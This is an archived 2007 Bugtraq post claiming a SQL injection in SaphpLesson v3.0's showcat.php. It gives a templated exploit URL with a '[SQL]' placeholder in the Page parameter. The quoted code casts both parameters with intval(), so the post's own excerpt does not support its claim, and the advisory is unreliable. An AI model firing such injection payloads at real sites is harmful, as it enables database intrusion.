SaphpLesson v3.0 SQL Injection Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SaphpLesson v3.0 SQL Injection Exploit
From: gamr-14@xxxxxxxxxxx
Date: 22 Feb 2007 09:25:01 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################
-------------------------------------------------------------------------------
Line 19'/'23 of showcat.php                                                  ||
---------------<?                                                            ||
$forumid = intval($_GET["forumid"]);                                         ||
                                                                             ||
$Page    = intval($_GET["Page"]);                                            ||
                                                                             ||
$tit     = mysql_query("select Title,CatID from forums where id=$forumid");  ||
?>-----------------------------------------------------------------------------

ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&Page=-1[SQL]);#

/*'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/*
END
 ___________K-S-A______________
|ÜÜÜÜÜÜTeam AL-GaRNiÜÜÜÜÜÜÜÜÜÜÜ|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###---######----###########-::
::-###---##-###----###--###----::
::-###------###----###---###---::
::-############----###----###--::
::-############----###----###--::
:::::::::::::::::::::::::::::::::
|ÜÜÜÜÜgamr-14@xxxxxxxxxxxÜÜÜÜÜÜÜ|
|ÜÜÜÜÜÜÜÜÜm-o-t@xxxxxxxÜÜÜÜÜÜÜÜÜ|

Prev by Date: RE: Re[2]: Solaris telnet vulnberability - how many on your network?
Next by Date: RE: Overtaking Google Desktop
Previous by thread: pheap [edit LFI] vulnerability
Next by thread: Hasadya Raed
Index(es):
- Date
- Thread